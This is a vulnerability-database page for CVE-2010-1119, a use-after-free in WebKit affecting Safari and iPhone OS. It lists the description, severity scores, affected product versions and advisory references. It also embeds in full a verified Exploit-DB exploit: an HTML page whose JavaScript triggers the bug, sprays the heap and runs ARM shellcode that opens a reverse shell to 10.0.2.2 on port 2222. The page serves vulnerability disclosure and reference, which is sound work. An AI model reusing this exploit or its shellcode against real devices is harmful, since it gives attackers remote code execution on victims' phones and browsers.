CVE-2010-1119 : Detail

CVE-2010-1119

87.57%V3
Network
2010-03-25
19h31 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Safari before 4.1 on Mac OS X 10.4, and Safari on Apple iPhone OS allows remote attackers to execute arbitrary code or cause a denial of service (application crash), or read the SMS database or other data, via vectors related to "attribute manipulation," as demonstrated by Vincenzo Iozzo and Ralf Philipp Weinmann during a Pwn2Own competition at CanSecWest 2010.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 16974

Publication date : 2011-03-13 23h00 +00:00
Author : MJ Keith
EDB Verified : Yes

<html> <!-- # Exploit Title: android exploit for 2010-1119 use after free # Date: 2011/03/11 # Author: MJ Keith # Software Link: http://www.android.com/ # Version: 2.0 ,2.1 , 2.1.1 # Tested on: Android # CVE : 2010-1119 This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides email: mkeith AT exploitscience.org --> <head> <script language="JavaScript"> function heap() { var id = document.getElementById("target"); var attribute = id.getAttributeNode('id'); nodes = attribute.childNodes; document.body.removeChild(id); attribute.removeChild(nodes[0]); setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); }; var scode = unescape("\u0060\u0060"); var scode2 = unescape("\u5005\ue1a0"); var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\ \u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002"); shell += unescape("\uae08"); // Port = 2222 shell += unescape("\u000a\u0202"); // IP = 10.0.2.2 shell += unescape("\u2000\u2000"); // string terminate do { scode += scode; scode2 += scode2; } while (scode.length<=0x1000); scode2 += shell target = new Array(); for(i = 0; i < 300; i++){ if (i<130){ target[i] = scode;} if (i>130){ target[i] = scode2;} document.write(target[i]); document.write("<br />"); if (i>250){ // alert("freeze"); nodes[0].textContent} } }, 0); } </script> </head> <body onload=heap()> <p id=target></p> </body> </html>

Products Mentioned

Configuraton 0

Apple>>Safari >> Version To (including) 4.0.5

Apple>>Safari >> Version 1.0

Apple>>Safari >> Version 1.0

Apple>>Safari >> Version 1.0

Apple>>Safari >> Version 1.0.0

Apple>>Safari >> Version 1.0.0b1

Apple>>Safari >> Version 1.0.0b2

Apple>>Safari >> Version 1.0.1

Apple>>Safari >> Version 1.0.2

Apple>>Safari >> Version 1.0.3

Apple>>Safari >> Version 1.0.3

Apple>>Safari >> Version 1.0.3

Apple>>Safari >> Version 1.1

Apple>>Safari >> Version 1.1.0

Apple>>Safari >> Version 1.1.1

Apple>>Safari >> Version 1.2

Apple>>Safari >> Version 1.2.0

Apple>>Safari >> Version 1.2.1

Apple>>Safari >> Version 1.2.2

Apple>>Safari >> Version 1.2.3

Apple>>Safari >> Version 1.2.4

Apple>>Safari >> Version 1.2.5

Apple>>Safari >> Version 1.3

Apple>>Safari >> Version 1.3.0

Apple>>Safari >> Version 1.3.1

Apple>>Safari >> Version 1.3.2

Apple>>Safari >> Version 1.3.2

Apple>>Safari >> Version 1.3.2

Apple>>Safari >> Version 2

Apple>>Safari >> Version 2.0

Apple>>Safari >> Version 2.0.0

Apple>>Safari >> Version 2.0.1

Apple>>Safari >> Version 2.0.2

Apple>>Safari >> Version 2.0.3

Apple>>Safari >> Version 2.0.3

Apple>>Safari >> Version 2.0.3

Apple>>Safari >> Version 2.0.3

Apple>>Safari >> Version 2.0.3

Apple>>Safari >> Version 2.0.4

Apple>>Safari >> Version 3

Apple>>Safari >> Version 3.0

Apple>>Safari >> Version 3.0.0

Apple>>Safari >> Version 3.0.0b

Apple>>Safari >> Version 3.0.1

Apple>>Safari >> Version 3.0.1

Apple>>Safari >> Version 3.0.1b

Apple>>Safari >> Version 3.0.2

Apple>>Safari >> Version 3.0.2b

Apple>>Safari >> Version 3.0.3

Apple>>Safari >> Version 3.0.3b

Apple>>Safari >> Version 3.0.4

Apple>>Safari >> Version 3.0.4b

Apple>>Safari >> Version 3.1

    Apple>>Safari >> Version 3.1.0

    Apple>>Safari >> Version 3.1.0b

    Apple>>Safari >> Version 3.1.1

    Apple>>Safari >> Version 3.1.2

    Apple>>Safari >> Version 3.2.0

    Apple>>Safari >> Version 3.2.1

    Apple>>Safari >> Version 3.2.2

    Apple>>Safari >> Version 3.2.3

      Apple>>Safari >> Version 4.0

      Apple>>Safari >> Version 4.0

      Apple>>Safari >> Version 4.0.0b

      Apple>>Safari >> Version 4.0.1

      Apple>>Safari >> Version 4.0.2

      Apple>>Safari >> Version 4.0.3

      Apple>>Safari >> Version 4.0.4

      Apple>>Safari >> Version 4.1

      Apple>>Mac_os_x >> Version 10.5

      Apple>>Mac_os_x >> Version 10.5.0

      Apple>>Mac_os_x >> Version 10.5.1

      Apple>>Mac_os_x >> Version 10.5.2

      Apple>>Mac_os_x >> Version 10.5.3

      Apple>>Mac_os_x >> Version 10.5.4

      Apple>>Mac_os_x >> Version 10.5.5

      Apple>>Mac_os_x >> Version 10.5.6

      Apple>>Mac_os_x >> Version 10.5.7

      Apple>>Mac_os_x >> Version 10.5.8

      Apple>>Mac_os_x >> Version 10.6.0

      Apple>>Mac_os_x_server >> Version 10.5.0

      Apple>>Mac_os_x_server >> Version 10.5.1

      Apple>>Mac_os_x_server >> Version 10.5.2

      Apple>>Mac_os_x_server >> Version 10.5.3

      Apple>>Mac_os_x_server >> Version 10.5.4

      Apple>>Mac_os_x_server >> Version 10.5.5

      Apple>>Mac_os_x_server >> Version 10.5.6

      Apple>>Mac_os_x_server >> Version 10.5.7

      Apple>>Mac_os_x_server >> Version 10.5.8

      Apple>>Mac_os_x_server >> Version 10.6.0

      Apple>>Mac_os_x_server >> Version 10.6.1

      Apple>>Mac_os_x_server >> Version 10.6.2

      Apple>>Mac_os_x_server >> Version 10.6.3

      Apple>>Mac_os_x_server >> Version 10.6.4

      Microsoft>>Windows >> Version *

      Configuraton 0

      Apple>>Iphone_os >> Version 2.0

      Apple>>Iphone_os >> Version 2.0.0

      Apple>>Iphone_os >> Version 2.0.1

      Apple>>Iphone_os >> Version 2.0.2

      Apple>>Iphone_os >> Version 2.1

      Apple>>Iphone_os >> Version 2.1.1

      Apple>>Iphone_os >> Version 2.2

      Apple>>Iphone_os >> Version 2.2.1

      Apple>>Iphone_os >> Version 3.0

      Apple>>Iphone_os >> Version 3.0.1

      Apple>>Iphone_os >> Version 3.1

      Apple>>Iphone_os >> Version 3.1.2

      Apple>>Iphone_os >> Version 3.1.3

      References

      http://support.apple.com/kb/HT4220
      Tags : x_refsource_CONFIRM
      http://support.apple.com/kb/HT4225
      Tags : x_refsource_CONFIRM
      http://secunia.com/advisories/40196
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://secunia.com/advisories/40105
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.vupen.com/english/advisories/2010/1373
      Tags : vdb-entry, x_refsource_VUPEN
      http://www.vupen.com/english/advisories/2010/1512
      Tags : vdb-entry, x_refsource_VUPEN
      http://www.securityfocus.com/bid/40620
      Tags : vdb-entry, x_refsource_BID
      http://securityreason.com/securityalert/8128
      Tags : third-party-advisory, x_refsource_SREASON
      http://securitytracker.com/id?1024067
      Tags : vdb-entry, x_refsource_SECTRACK
      http://support.apple.com/kb/HT4196
      Tags : x_refsource_CONFIRM